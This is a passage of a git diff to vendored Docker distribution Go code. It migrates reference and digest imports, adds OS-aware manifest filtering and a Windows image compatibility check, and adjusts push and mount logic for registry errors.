@@ -8,9 +8,11 @@ import ( "strings" "testing" - "github.com/docker/distribution/digest" "github.com/docker/distribution/manifest/schema1" - "github.com/docker/docker/reference" + "github.com/docker/distribution/reference" + "github.com/opencontainers/go-digest" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) // TestFixManifestLayers checks that fixManifestLayers removes a duplicate @@ -102,9 +104,8 @@ func TestFixManifestLayersBadParent(t *testing.T) { }, } - if err := fixManifestLayers(&duplicateLayerManifest); err == nil || !strings.Contains(err.Error(), "Invalid parent ID.") { - t.Fatalf("expected an invalid parent ID error from fixManifestLayers") - } + err := fixManifestLayers(&duplicateLayerManifest) + assert.Check(t, is.ErrorContains(err, "invalid parent ID")) } // TestValidateManifest verifies the validateManifest function @@ -113,7 +114,7 @@ func TestValidateManifest(t *testing.T) { if runtime.GOOS == "windows" { t.Skip("Needs fixing on Windows") } - expectedDigest, err := reference.ParseNamed("repo@sha256:02fee8c3220ba806531f606525eceb83f4feb654f62b207191b1c9209188dedd") + expectedDigest, err := reference.ParseNormalizedNamed("repo@sha256:02fee8c3220ba806531f606525eceb83f4feb654f62b207191b1c9209188dedd") if err != nil { t.Fatal("could not parse reference") } diff --git a/vendor/github.com/docker/docker/distribution/pull_v2_unix.go b/vendor/github.com/docker/docker/distribution/pull_v2_unix.go index 45a7a0c150..0be8a03242 100644 --- a/vendor/github.com/docker/docker/distribution/pull_v2_unix.go +++ b/vendor/github.com/docker/docker/distribution/pull_v2_unix.go @@ -1,13 +1,34 @@ // +build !windows -package distribution +package distribution // import "github.com/docker/docker/distribution" import ( + "context" + "runtime" + "github.com/docker/distribution" - "github.com/docker/distribution/context" + "github.com/docker/distribution/manifest/manifestlist" + "github.com/sirupsen/logrus" ) func (ld *v2LayerDescriptor) open(ctx context.Context) (distribution.ReadSeekCloser, error) { blobs := ld.repo.Blobs(ctx) return blobs.Open(ctx, ld.digest) } + +func filterManifests(manifests []manifestlist.ManifestDescriptor, os string) []manifestlist.ManifestDescriptor { + var matches []manifestlist.ManifestDescriptor + for _, manifestDescriptor := range manifests { + if manifestDescriptor.Platform.Architecture == runtime.GOARCH && manifestDescriptor.Platform.OS == os { + matches = append(matches, manifestDescriptor) + + logrus.Debugf("found match for %s/%s with media type %s, digest %s", os, runtime.GOARCH, manifestDescriptor.MediaType, manifestDescriptor.Digest.String()) + } + } + return matches +} + +// checkImageCompatibility is a Windows-specific function. No-op on Linux +func checkImageCompatibility(imageOS, imageOSVersion string) error { + return nil +} diff --git a/vendor/github.com/docker/docker/distribution/pull_v2_windows.go b/vendor/github.com/docker/docker/distribution/pull_v2_windows.go index aefed86601..432a36119d 100644 --- a/vendor/github.com/docker/docker/distribution/pull_v2_windows.go +++ b/vendor/github.com/docker/docker/distribution/pull_v2_windows.go @@ -1,16 +1,22 @@ -// +build windows - -package distribution +package distribution // import "github.com/docker/docker/distribution" import ( + "context" + "errors" + "fmt" "net/http" "os" + "runtime" + "sort" + "strconv" + "strings" - "github.com/Sirupsen/logrus" "github.com/docker/distribution" - "github.com/docker/distribution/context" + "github.com/docker/distribution/manifest/manifestlist" "github.com/docker/distribution/manifest/schema2" "github.com/docker/distribution/registry/client/transport" + "github.com/docker/docker/pkg/system" + "github.com/sirupsen/logrus" ) var _ distribution.Describable = &v2LayerDescriptor{} @@ -23,20 +29,28 @@ func (ld *v2LayerDescriptor) Descriptor() distribution.Descriptor { } func (ld *v2LayerDescriptor) open(ctx context.Context) (distribution.ReadSeekCloser, error) { + blobs := ld.repo.Blobs(ctx) + rsc, err := blobs.Open(ctx, ld.digest) + if len(ld.src.URLs) == 0 { - blobs := ld.repo.Blobs(ctx) - return blobs.Open(ctx, ld.digest) + return rsc, err } - var ( - err error - rsc distribution.ReadSeekCloser - ) + // We're done if the registry has this blob. + if err == nil { + // Seek does an HTTP GET. If it succeeds, the blob really is accessible. + if _, err = rsc.Seek(0, os.SEEK_SET); err == nil { + return rsc, nil + } + rsc.Close() + } // Find the first URL that results in a 200 result code. for _, url := range ld.src.URLs { logrus.Debugf("Pulling %v from foreign URL %v", ld.digest, url) rsc = transport.NewHTTPReadSeeker(http.DefaultClient, url, nil) + + // Seek does an HTTP GET. If it succeeds, the blob really is accessible. _, err = rsc.Seek(0, os.SEEK_SET) if err == nil { break @@ -47,3 +61,70 @@ func (ld *v2LayerDescriptor) open(ctx context.Context) (distribution.ReadSeekClo } return rsc, err } + +func filterManifests(manifests []manifestlist.ManifestDescriptor, os string) []manifestlist.ManifestDescriptor { + osVersion := "" + if os == "windows" { + version := system.GetOSVersion() + osVersion = fmt.Sprintf("%d.%d.%d", version.MajorVersion, version.MinorVersion, version.Build) + logrus.Debugf("will prefer entries with version %s", osVersion) + } + + var matches []manifestlist.ManifestDescriptor + for _, manifestDescriptor := range manifests { + if manifestDescriptor.Platform.Architecture == runtime.GOARCH && manifestDescriptor.Platform.OS == os { + matches = append(matches, manifestDescriptor) + logrus.Debugf("found match for %s/%s %s with media type %s, digest %s", os, runtime.GOARCH, manifestDescriptor.Platform.OSVersion, manifestDescriptor.MediaType, manifestDescriptor.Digest.String()) + } else { + logrus.Debugf("ignoring %s/%s %s with media type %s, digest %s", os, runtime.GOARCH, manifestDescriptor.Platform.OSVersion, manifestDescriptor.MediaType, manifestDescriptor.Digest.String()) + } + } + if os == "windows" { + sort.Stable(manifestsByVersion{osVersion, matches}) + } + return matches +} + +func versionMatch(actual, expected string) bool { + // Check whether the version matches up to the build, ignoring UBR + return strings.HasPrefix(actual, expected+".") +} + +type manifestsByVersion struct { + version string + list []manifestlist.ManifestDescriptor +} + +func (mbv manifestsByVersion) Less(i, j int) bool { + // TODO: Split version by parts and compare + // TODO: Prefer versions which have a greater version number + // Move compatible versions to the top, with no other ordering changes + return versionMatch(mbv.list[i].Platform.OSVersion, mbv.version) && !versionMatch(mbv.list[j].Platform.OSVersion, mbv.version) +} + +func (mbv manifestsByVersion) Len() int { + return len(mbv.list) +} + +func (mbv manifestsByVersion) Swap(i, j int) { + mbv.list[i], mbv.list[j] = mbv.list[j], mbv.list[i] +} + +// checkImageCompatibility blocks pulling incompatible images based on a later OS build +// Fixes https://github.com/moby/moby/issues/36184. +func checkImageCompatibility(imageOS, imageOSVersion string) error { + if imageOS == "windows" { + hostOSV := system.GetOSVersion() + splitImageOSVersion := strings.Split(imageOSVersion, ".") // eg 10.0.16299.nnnn + if len(splitImageOSVersion) >= 3 { + if imageOSBuild, err := strconv.Atoi(splitImageOSVersion[2]); err == nil { + if imageOSBuild > int(hostOSV.Build) { + errMsg := fmt.Sprintf("a Windows version %s.%s.%s-based image is incompatible with a %s host", splitImageOSVersion[0], splitImageOSVersion[1], splitImageOSVersion[2], hostOSV.ToString()) + logrus.Debugf(errMsg) + return errors.New(errMsg) + } + } + } + } + return nil +} diff --git a/vendor/github.com/docker/docker/distribution/push.go b/vendor/github.com/docker/docker/distribution/push.go index d35bdb103e..eb3bc55974 100644 --- a/vendor/github.com/docker/docker/distribution/push.go +++ b/vendor/github.com/docker/docker/distribution/push.go @@ -1,17 +1,17 @@ -package distribution +package distribution // import "github.com/docker/docker/distribution" import ( "bufio" "compress/gzip" + "context" "fmt" "io" - "github.com/Sirupsen/logrus" + "github.com/docker/distribution/reference" "github.com/docker/docker/distribution/metadata" "github.com/docker/docker/pkg/progress" - "github.com/docker/docker/reference" "github.com/docker/docker/registry" - "golang.org/x/net/context" + "github.com/sirupsen/logrus" ) // Pusher is an interface that abstracts pushing for different API versions. @@ -64,16 +64,16 @@ func Push(ctx context.Context, ref reference.Named, imagePushConfig *ImagePushCo return err } - endpoints, err := imagePushConfig.RegistryService.LookupPushEndpoints(repoInfo.Hostname()) + endpoints, err := imagePushConfig.RegistryService.LookupPushEndpoints(reference.Domain(repoInfo.Name)) if err != nil { return err } - progress.Messagef(imagePushConfig.ProgressOutput, "", "The push refers to a repository [%s]", repoInfo.FullName()) + progress.Messagef(imagePushConfig.ProgressOutput, "", "The push refers to repository [%s]", repoInfo.Name.Name()) - associations := imagePushConfig.ReferenceStore.ReferencesByName(repoInfo) + associations := imagePushConfig.ReferenceStore.ReferencesByName(repoInfo.Name) if len(associations) == 0 { - return fmt.Errorf("An image does not exist locally with the tag: %s", repoInfo.Name()) + return fmt.Errorf("An image does not exist locally with the tag: %s", reference.FamiliarName(repoInfo.Name)) } var ( @@ -106,7 +106,7 @@ func Push(ctx context.Context, ref reference.Named, imagePushConfig *ImagePushCo } } - logrus.Debugf("Trying to push %s to %s %s", repoInfo.FullName(), endpoint.URL, endpoint.Version) + logrus.Debugf("Trying to push %s to %s %s", repoInfo.Name.Name(), endpoint.URL, endpoint.Version) pusher, err := NewPusher(ref, endpoint, repoInfo, imagePushConfig) if err != nil { @@ -126,7 +126,7 @@ func Push(ctx context.Context, ref reference.Named, imagePushConfig *ImagePushCo } err = fallbackErr.err lastErr = err - logrus.Errorf("Attempting next endpoint for push after error: %v", err) + logrus.Infof("Attempting next endpoint for push after error: %v", err) continue } } @@ -135,12 +135,12 @@ func Push(ctx context.Context, ref reference.Named, imagePushConfig *ImagePushCo return err } - imagePushConfig.ImageEventLogger(ref.String(), repoInfo.Name(), "push") + imagePushConfig.ImageEventLogger(reference.FamiliarString(ref), reference.FamiliarName(repoInfo.Name), "push") return nil } if lastErr == nil { - lastErr = fmt.Errorf("no endpoints found for %s", repoInfo.FullName()) + lastErr = fmt.Errorf("no endpoints found for %s", repoInfo.Name.Name()) } return lastErr } diff --git a/vendor/github.com/docker/docker/distribution/push_v1.go b/vendor/github.com/docker/docker/distribution/push_v1.go index 257ac181ec..7bd75e9fe6 100644 --- a/vendor/github.com/docker/docker/distribution/push_v1.go +++ b/vendor/github.com/docker/docker/distribution/push_v1.go @@ -1,11 +1,11 @@ -package distribution +package distribution // import "github.com/docker/docker/distribution" import ( + "context" "fmt" "sync" - "github.com/Sirupsen/logrus" - "github.com/docker/distribution/digest" + "github.com/docker/distribution/reference" "github.com/docker/distribution/registry/client/transport" "github.com/docker/docker/distribution/metadata" "github.com/docker/docker/dockerversion" @@ -15,9 +15,10 @@ import ( "github.com/docker/docker/pkg/ioutils" "github.com/docker/docker/pkg/progress" "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/reference" + "github.com/docker/docker/pkg/system" "github.com/docker/docker/registry" - "golang.org/x/net/context" + "github.com/opencontainers/go-digest" + "github.com/sirupsen/logrus" ) type v1Pusher struct { @@ -38,14 +39,10 @@ func (p *v1Pusher) Push(ctx context.Context) error { tr := transport.NewTransport( // TODO(tiborvass): was NoTimeout registry.NewTransport(tlsConfig), - registry.DockerHeaders(dockerversion.DockerUserAgent(ctx), p.config.MetaHeaders)..., + registry.Headers(dockerversion.DockerUserAgent(ctx), p.config.MetaHeaders)..., ) client := registry.HTTPClient(tr) - v1Endpoint, err := p.endpoint.ToV1Endpoint(dockerversion.DockerUserAgent(ctx), p.config.MetaHeaders) - if err != nil { - logrus.Debugf("Could not get v1 endpoint: %v", err) - return fallbackError{err: err} - } + v1Endpoint := p.endpoint.ToV1Endpoint(dockerversion.DockerUserAgent(ctx), p.config.MetaHeaders) p.session, err = registry.NewSession(client, p.config.AuthConfig, v1Endpoint) if err != nil { // TODO(dmcgowan): Check if should fallback @@ -118,10 +115,10 @@ type v1DependencyImage struct { v1ImageCommon } -func newV1DependencyImage(l layer.Layer, parent *v1DependencyImage) (*v1DependencyImage, error) { +func newV1DependencyImage(l layer.Layer, parent *v1DependencyImage) *v1DependencyImage { v1ID := digest.Digest(l.ChainID()).Hex() - config := "" + var config string if parent != nil { config = fmt.Sprintf(`{"id":"%s","parent":"%s"}`, v1ID, parent.V1ID()) } else { @@ -133,7 +130,7 @@ func newV1DependencyImage(l layer.Layer, parent *v1DependencyImage) (*v1Dependen config: []byte(config), layer: l, }, - }, nil + } } // Retrieve the all the images to be uploaded in the correct order @@ -214,7 +211,10 @@ func (p *v1Pusher) imageListForTag(imgID image.ID, dependenciesSeen map[layer.Ch topLayerID := img.RootFS.ChainID() - pl, err := p.config.LayerStore.Get(topLayerID) + if !system.IsOSSupported(img.OperatingSystem()) { + return nil, system.ErrNotSupportedOperatingSystem + } + pl, err := p.config.LayerStores[img.OperatingSystem()].Get(topLayerID) *referencedLayers = append(*referencedLayers, pl) if err != nil { return nil, fmt.Errorf("failed to get top layer from image: %v", err) @@ -227,10 +227,7 @@ func (p *v1Pusher) imageListForTag(imgID image.ID, dependenciesSeen map[layer.Ch } l := lsl.Layer - dependencyImages, parent, err := generateDependencyImages(l.Parent(), dependenciesSeen) - if err != nil { - return nil, err - } + dependencyImages, parent := generateDependencyImages(l.Parent(), dependenciesSeen) topImage, err := newV1TopImage(imgID, img, l, parent) if err != nil { @@ -242,32 +239,29 @@ func (p *v1Pusher) imageListForTag(imgID image.ID, dependenciesSeen map[layer.Ch return } -func generateDependencyImages(l layer.Layer, dependenciesSeen map[layer.ChainID]*v1DependencyImage) (imageListForThisTag []v1Image, parent *v1DependencyImage, err error) { +func generateDependencyImages(l layer.Layer, dependenciesSeen map[layer.ChainID]*v1DependencyImage) (imageListForThisTag []v1Image, parent *v1DependencyImage) { if l == nil { - return nil, nil, nil + return nil, nil } - imageListForThisTag, parent, err = generateDependencyImages(l.Parent(), dependenciesSeen) + imageListForThisTag, parent = generateDependencyImages(l.Parent(), dependenciesSeen) if dependenciesSeen != nil { if dependencyImage, present := dependenciesSeen[l.ChainID()]; present { // This layer is already on the list, we can ignore it // and all its parents. - return imageListForThisTag, dependencyImage, nil + return imageListForThisTag, dependencyImage } } - dependencyImage, err := newV1DependencyImage(l, parent) - if err != nil { - return nil, nil, err - } + dependencyImage := newV1DependencyImage(l, parent) imageListForThisTag = append(imageListForThisTag, dependencyImage) if dependenciesSeen != nil { dependenciesSeen[l.ChainID()] = dependencyImage } - return imageListForThisTag, dependencyImage, nil + return imageListForThisTag, dependencyImage } // createImageIndex returns an index of an image's layer IDs and tags. @@ -362,8 +356,8 @@ func (p *v1Pusher) pushImageToEndpoint(ctx context.Context, endpoint string, ima } if topImage, isTopImage := img.(*v1TopImage); isTopImage { for _, tag := range tags[topImage.imageID] { - progress.Messagef(p.config.ProgressOutput, "", "Pushing tag for rev [%s] on {%s}", stringid.TruncateID(v1ID), endpoint+"repositories/"+p.repoInfo.RemoteName()+"/tags/"+tag) - if err := p.session.PushRegistryTag(p.repoInfo, v1ID, tag, endpoint); err != nil { + progress.Messagef(p.config.ProgressOutput, "", "Pushing tag for rev [%s] on {%s}", stringid.TruncateID(v1ID), endpoint+"repositories/"+reference.Path(p.repoInfo.Name)+"/tags/"+tag) + if err := p.session.PushRegistryTag(p.repoInfo.Name, v1ID, tag, endpoint); err != nil { return err } } @@ -391,7 +385,7 @@ func (p *v1Pusher) pushRepository(ctx context.Context) error { // Register all the images in a repository with the registry // If an image is not in this list it will not be associated with the repository - repoData, err := p.session.PushImageJSONIndex(p.repoInfo, imageIndex, false, nil) + repoData, err := p.session.PushImageJSONIndex(p.repoInfo.Name, imageIndex, false, nil) if err != nil { return err } @@ -401,7 +395,7 @@ func (p *v1Pusher) pushRepository(ctx context.Context) error { return err } } - _, err = p.session.PushImageJSONIndex(p.repoInfo, imageIndex, true, repoData.Endpoints) + _, err = p.session.PushImageJSONIndex(p.repoInfo.Name, imageIndex, true, repoData.Endpoints) return err } diff --git a/vendor/github.com/docker/docker/distribution/push_v2.go b/vendor/github.com/docker/docker/distribution/push_v2.go index 1f8c822fec..9dc3e7a2a6 100644 --- a/vendor/github.com/docker/docker/distribution/push_v2.go +++ b/vendor/github.com/docker/docker/distribution/push_v2.go @@ -1,6 +1,7 @@ -package distribution +package distribution // import "github.com/docker/docker/distribution" import ( + "context" "errors" "fmt" "io" @@ -9,23 +10,22 @@ import ( "strings" "sync" - "golang.org/x/net/context" - - "github.com/Sirupsen/logrus" "github.com/docker/distribution" - "github.com/docker/distribution/digest" "github.com/docker/distribution/manifest/schema1" "github.com/docker/distribution/manifest/schema2" - distreference "github.com/docker/distribution/reference" + "github.com/docker/distribution/reference" + "github.com/docker/distribution/registry/api/errcode" "github.com/docker/distribution/registry/client" + apitypes "github.com/docker/docker/api/types" "github.com/docker/docker/distribution/metadata" "github.com/docker/docker/distribution/xfer" "github.com/docker/docker/layer" "github.com/docker/docker/pkg/ioutils" "github.com/docker/docker/pkg/progress" "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/reference" "github.com/docker/docker/registry" + "github.com/opencontainers/go-digest" + "github.com/sirupsen/logrus" ) const ( @@ -33,15 +33,6 @@ const ( middleLayerMaximumSize = 10 * (1 << 20) // 10MB ) -// PushResult contains the tag, manifest digest, and manifest size from the -// push. It's used to signal this information to the trust code in the client -// so it can sign the manifest if necessary. -type PushResult struct { - Tag string - Digest digest.Digest - Size int -} - type v2Pusher struct { v2MetadataService metadata.V2MetadataService ref reference.Named @@ -64,19 +55,21 @@ type pushState struct { // confirmedV2 is set to true if we confirm we're talking to a v2 // registry. This is used to limit fallbacks to the v1 protocol. confirmedV2 bool + hasAuthInfo bool } func (p *v2Pusher) Push(ctx context.Context) (err error) { p.pushState.remoteLayers = make(map[layer.DiffID]distribution.Descriptor) p.repo, p.pushState.confirmedV2, err = NewV2Repository(ctx, p.repoInfo, p.endpoint, p.config.MetaHeaders, p.config.AuthConfig, "push", "pull") + p.pushState.hasAuthInfo = p.config.AuthConfig.RegistryToken != "" || (p.config.AuthConfig.Username != "" && p.config.AuthConfig.Password != "") if err != nil { logrus.Debugf("Error getting v2 registry: %v", err) return err } if err = p.pushV2Repository(ctx); err != nil { - if continueOnError(err) { + if continueOnError(err, p.endpoint.Mirror) { return fallbackError{ err: err, confirmedV2: p.pushState.confirmedV2, @@ -91,7 +84,7 @@ func (p *v2Pusher) pushV2Repository(ctx context.Context) (err error) { if namedTagged, isNamedTagged := p.ref.(reference.NamedTagged); isNamedTagged { imageID, err := p.config.ReferenceStore.Get(p.ref) if err != nil { - return fmt.Errorf("tag does not exist: %s", p.ref.String()) + return fmt.Errorf("tag does not exist: %s", reference.FamiliarString(p.ref)) } return p.pushV2Tag(ctx, namedTagged, imageID) @@ -113,26 +106,31 @@ func (p *v2Pusher) pushV2Repository(ctx context.Context) (err error) { } if pushed == 0 { - return fmt.Errorf("no tags to push for %s", p.repoInfo.Name()) + return fmt.Errorf("no tags to push for %s", reference.FamiliarName(p.repoInfo.Name)) } return nil } func (p *v2Pusher) pushV2Tag(ctx context.Context, ref reference.NamedTagged, id digest.Digest) error { - logrus.Debugf("Pushing repository: %s", ref.String()) + logrus.Debugf("Pushing repository: %s", reference.FamiliarString(ref)) imgConfig, err := p.config.ImageStore.Get(id) if err != nil { - return fmt.Errorf("could not find image from tag %s: %v", ref.String(), err) + return fmt.Errorf("could not find image from tag %s: %v", reference.FamiliarString(ref), err) } rootfs, err := p.config.ImageStore.RootFSFromConfig(imgConfig) if err != nil { - return fmt.Errorf("unable to get rootfs for image %s: %s", ref.String(), err) + return fmt.Errorf("unable to get rootfs for image %s: %s", reference.FamiliarString(ref), err) + } + + platform, err := p.config.ImageStore.PlatformFromConfig(imgConfig) + if err != nil { + return fmt.Errorf("unable to get platform for image %s: %s", reference.FamiliarString(ref), err) } - l, err := p.config.LayerStore.Get(rootfs.ChainID()) + l, err := p.config.LayerStores[platform.OS].Get(rootfs.ChainID()) if err != nil { return fmt.Errorf("failed to get top layer from image: %v", err) } @@ -148,14 +146,15 @@ func (p *v2Pusher) pushV2Tag(ctx context.Context, ref reference.NamedTagged, id descriptorTemplate := v2PushDescriptor{ v2MetadataService: p.v2MetadataService, hmacKey: hmacKey, - repoInfo: p.repoInfo, + repoInfo: p.repoInfo.Name, ref: p.ref, + endpoint: p.endpoint, repo: p.repo, pushState: &p.pushState, } // Loop bounds condition is to avoid pushing the base layer on Windows. - for i := 0; i < len(rootfs.DiffIDs); i++ { + for range rootfs.DiffIDs { descriptor := descriptorTemplate descriptor.layer = l descriptor.checkedDigests = make(map[digest.Digest]struct{}) @@ -189,7 +188,7 @@ func (p *v2Pusher) pushV2Tag(ctx context.Context, ref reference.NamedTagged, id logrus.Warnf("failed to upload schema2 manifest: %v - falling back to schema1", err) - manifestRef, err := distreference.WithTag(p.repo.Named(), ref.Tag()) + manifestRef, err := reference.WithTag(p.repo.Named(), ref.Tag()) if err != nil { return err } @@ -225,7 +224,7 @@ func (p *v2Pusher) pushV2Tag(ctx context.Context, ref reference.NamedTagged, id // Signal digest to the trust client so it can sign the // push, if appropriate. - progress.Aux(p.config.ProgressOutput, PushResult{Tag: ref.Tag(), Digest: manifestDigest, Size: len(canonicalManifest)}) + progress.Aux(p.config.ProgressOutput, apitypes.PushResult{Tag: ref.Tag(), Digest: manifestDigest.String(), Size: len(canonicalManifest)}) return nil } @@ -248,6 +247,7 @@ type v2PushDescriptor struct { hmacKey []byte repoInfo reference.Named ref reference.Named + endpoint registry.APIEndpoint repo distribution.Repository pushState *pushState remoteDescriptor distribution.Descriptor @@ -256,7 +256,7 @@ type v2PushDescriptor struct { } func (pd *v2PushDescriptor) Key() string { - return "v2push:" + pd.ref.FullName() + " " + pd.layer.DiffID().String() + return "v2push:" + pd.ref.Name() + " " + pd.layer.DiffID().String() } func (pd *v2PushDescriptor) ID() string { @@ -268,10 +268,13 @@ func (pd *v2PushDescriptor) DiffID() layer.DiffID { } func (pd *v2PushDescriptor) Upload(ctx context.Context, progressOutput progress.Output) (distribution.Descriptor, error) { - if fs, ok := pd.layer.(distribution.Describable); ok { - if d := fs.Descriptor(); len(d.URLs) > 0 { - progress.Update(progressOutput, pd.ID(), "Skipped foreign layer") - return d, nil + // Skip foreign layers unless this registry allows nondistributable artifacts. + if !pd.endpoint.AllowNondistributableArtifacts { + if fs, ok := pd.layer.(distribution.Describable); ok { + if d := fs.Descriptor(); len(d.URLs) > 0 { + progress.Update(progressOutput, pd.ID(), "Skipped foreign layer") + return d, nil + } } } @@ -292,8 +295,8 @@ func (pd *v2PushDescriptor) Upload(ctx context.Context, progressOutput progress. // Do we have any metadata associated with this layer's DiffID? v2Metadata, err := pd.v2MetadataService.GetMetadata(diffID) if err == nil { - // check for blob existence in the target repository if we have a mapping with it - descriptor, exists, err := pd.layerAlreadyExists(ctx, progressOutput, diffID, false, 1, v2Metadata) + // check for blob existence in the target repository + descriptor, exists, err := pd.layerAlreadyExists(ctx, progressOutput, diffID, true, 1, v2Metadata) if exists || err != nil { return descriptor, err } @@ -307,28 +310,28 @@ func (pd *v2PushDescriptor) Upload(ctx context.Context, progressOutput progress. // Attempt to find another repository in the same registry to mount the layer from to avoid an unnecessary upload candidates := getRepositoryMountCandidates(pd.repoInfo, pd.hmacKey, maxMountAttempts, v2Metadata) + isUnauthorizedError := false for _, mountCandidate := range candidates { logrus.Debugf("attempting to mount layer %s (%s) from %s", diffID, mountCandidate.Digest, mountCandidate.SourceRepository) createOpts := []distribution.BlobCreateOption{} if len(mountCandidate.SourceRepository) > 0 { - namedRef, err := reference.WithName(mountCandidate.SourceRepository) + namedRef, err := reference.ParseNormalizedNamed(mountCandidate.SourceRepository) if err != nil { - logrus.Errorf("failed to parse source repository reference %v: %v", namedRef.String(), err) + logrus.Errorf("failed to parse source repository reference %v: %v", reference.FamiliarString(namedRef), err) pd.v2MetadataService.Remove(mountCandidate) continue } - // TODO (brianbland): We need to construct a reference where the Name is - // only the full remote name, so clean this up when distribution has a - // richer reference package - remoteRef, err := distreference.WithName(namedRef.RemoteName()) + // Candidates are always under same domain, create remote reference + // with only path to set mount from with + remoteRef, err := reference.WithName(reference.Path(namedRef)) if err != nil { - logrus.Errorf("failed to make remote reference out of %q: %v", namedRef.RemoteName(), namedRef.RemoteName()) + logrus.Errorf("failed to make remote reference out of %q: %v", reference.Path(namedRef), err) continue } - canonicalRef, err := distreference.WithDigest(distreference.TrimNamed(remoteRef), mountCandidate.Digest) + canonicalRef, err := reference.WithDigest(reference.TrimNamed(remoteRef), mountCandidate.Digest) if err != nil { logrus.Errorf("failed to make canonical reference: %v", err) continue @@ -355,16 +358,31 @@ func (pd *v2PushDescriptor) Upload(ctx context.Context, progressOutput progress. // Cache mapping from this layer's DiffID to the blobsum if err := pd.v2MetadataService.TagAndAdd(diffID, pd.hmacKey, metadata.V2Metadata{ Digest: err.Descriptor.Digest, - SourceRepository: pd.repoInfo.FullName(), + SourceRepository: pd.repoInfo.Name(), }); err != nil { return distribution.Descriptor{}, xfer.DoNotRetry{Err: err} } return err.Descriptor, nil + case errcode.Errors: + for _, e := range err { + switch e := e.(type) { + case errcode.Error: + if e.Code == errcode.ErrorCodeUnauthorized { + // when unauthorized error that indicate user don't has right to push layer to register + logrus.Debugln("failed to push layer to registry because unauthorized error") + isUnauthorizedError = true + } + default: + } + } default: logrus.Infof("failed to mount layer %s (%s) from %s: %v", diffID, mountCandidate.Digest, mountCandidate.SourceRepository, err) } + // when error is unauthorizedError and user don't hasAuthInfo that's the case user don't has right to push layer to register + // and he hasn't login either, in this case candidate cache should be removed if len(mountCandidate.SourceRepository) > 0 && + !(isUnauthorizedError && !pd.pushState.hasAuthInfo) && (metadata.CheckV2MetadataHMAC(&mountCandidate, pd.hmacKey) || len(mountCandidate.HMAC) == 0) { cause := "blob mount failure" @@ -398,14 +416,8 @@ func (pd *v2PushDescriptor) Upload(ctx context.Context, progressOutput progress. } } defer layerUpload.Close() - // upload the blob - desc, err := pd.uploadUsingSession(ctx, progressOutput, diffID, layerUpload) - if err != nil { - return desc, err - } - - return desc, nil + return pd.uploadUsingSession(ctx, progressOutput, diffID, layerUpload) } func (pd *v2PushDescriptor) SetRemoteDescriptor(descriptor distribution.Descriptor) { @@ -425,6 +437,10 @@ func (pd *v2PushDescriptor) uploadUsingSession( var reader io.ReadCloser contentReader, err := pd.layer.Open() + if err != nil { + return distribution.Descriptor{}, retryOnError(err) + } + size, _ := pd.layer.Size() reader = progress.NewProgressReader(ioutils.NewCancelReadCloser(ctx, contentReader), progressOutput, size, pd.ID(), "Pushing") @@ -443,7 +459,7 @@ func (pd *v2PushDescriptor) uploadUsingSession( return distribution.Descriptor{}, fmt.Errorf("unsupported layer media type %s", m) } - digester := digest.Canonical.New() + digester := digest.Canonical.Digester() tee := io.TeeReader(reader, digester.Hash()) nn, err := layerUpload.ReadFrom(tee) @@ -463,7 +479,7 @@ func (pd *v2PushDescriptor) uploadUsingSession( // Cache mapping from this layer's DiffID to the blobsum if err := pd.v2MetadataService.TagAndAdd(diffID, pd.hmacKey, metadata.V2Metadata{ Digest: pushDigest, - SourceRepository: pd.repoInfo.FullName(), + SourceRepository: pd.repoInfo.Name(), }); err != nil { return distribution.Descriptor{}, xfer.DoNotRetry{Err: err} } @@ -498,7 +514,7 @@ func (pd *v2PushDescriptor) layerAlreadyExists( // filter the metadata candidates := []metadata.V2Metadata{} for _, meta := range v2Metadata { - if len(meta.SourceRepository) > 0 && !checkOtherRepositories && meta.SourceRepository != pd.repoInfo.FullName() { + if len(meta.SourceRepository) > 0 && !checkOtherRepositories && meta.SourceRepository != pd.repoInfo.Name() { continue } candidates = append(candidates, meta) @@ -529,16 +545,16 @@ func (pd *v2PushDescriptor) layerAlreadyExists( attempts: for _, dgst := range layerDigests { meta := digestToMetadata[dgst] - logrus.Debugf("Checking for presence of layer %s (%s) in %s", diffID, dgst, pd.repoInfo.FullName()) + logrus.Debugf("Checking for presence of layer %s (%s) in %s", diffID, dgst, pd.repoInfo.Name()) desc, err = pd.repo.Blobs(ctx).Stat(ctx, dgst) pd.checkedDigests[meta.Digest] = struct{}{} switch err { case nil: - if m, ok := digestToMetadata[desc.Digest]; !ok || m.SourceRepository != pd.repoInfo.FullName() || !metadata.CheckV2MetadataHMAC(m, pd.hmacKey) { + if m, ok := digestToMetadata[desc.Digest]; !ok || m.SourceRepository != pd.repoInfo.Name() || !metadata.CheckV2MetadataHMAC(m, pd.hmacKey) { // cache mapping from this layer's DiffID to the blobsum if err := pd.v2MetadataService.TagAndAdd(diffID, pd.hmacKey, metadata.V2Metadata{ Digest: desc.Digest, - SourceRepository: pd.repoInfo.FullName(), + SourceRepository: pd.repoInfo.Name(), }); err != nil { return distribution.Descriptor{}, false, xfer.DoNotRetry{Err: err} } @@ -547,12 +563,12 @@ attempts: exists = true break attempts case distribution.ErrBlobUnknown: - if meta.SourceRepository == pd.repoInfo.FullName() { + if meta.SourceRepository == pd.repoInfo.Name() { // remove the mapping to the target repository pd.v2MetadataService.Remove(*meta) } default: - logrus.WithError(err).Debugf("Failed to check for presence of layer %s (%s) in %s", diffID, dgst, pd.repoInfo.FullName()) + logrus.WithError(err).Debugf("Failed to check for presence of layer %s (%s) in %s", diffID, dgst, pd.repoInfo.Name()) } } @@ -595,7 +611,7 @@ func getMaxMountAndExistenceCheckAttempts(layer PushLayer) (maxMountAttempts, ma } // getRepositoryMountCandidates returns an array of v2 metadata items belonging to the given registry. The -// array is sorted from youngest to oldest. If requireReigstryMatch is true, the resulting array will contain +// array is sorted from youngest to oldest. If requireRegistryMatch is true, the resulting array will contain // only metadata entries having registry part of SourceRepository matching the part of repoInfo. func getRepositoryMountCandidates( repoInfo reference.Named, @@ -606,11 +622,11 @@ func getRepositoryMountCandidates( candidates := []metadata.V2Metadata{} for _, meta := range v2Metadata { sourceRepo, err := reference.ParseNamed(meta.SourceRepository) - if err != nil || repoInfo.Hostname() != sourceRepo.Hostname() { + if err != nil || reference.Domain(repoInfo) != reference.Domain(sourceRepo) { continue } // target repository is not a viable candidate - if meta.SourceRepository == repoInfo.FullName() { + if meta.SourceRepository == repoInfo.Name() { continue } candidates = append(candidates, meta) @@ -652,6 +668,7 @@ func (bla byLikeness) Swap(i, j int) { } func (bla byLikeness) Len() int { return len(bla.arr) } +// nolint: interfacer func sortV2MetadataByLikenessAndAge(repoInfo reference.Named, 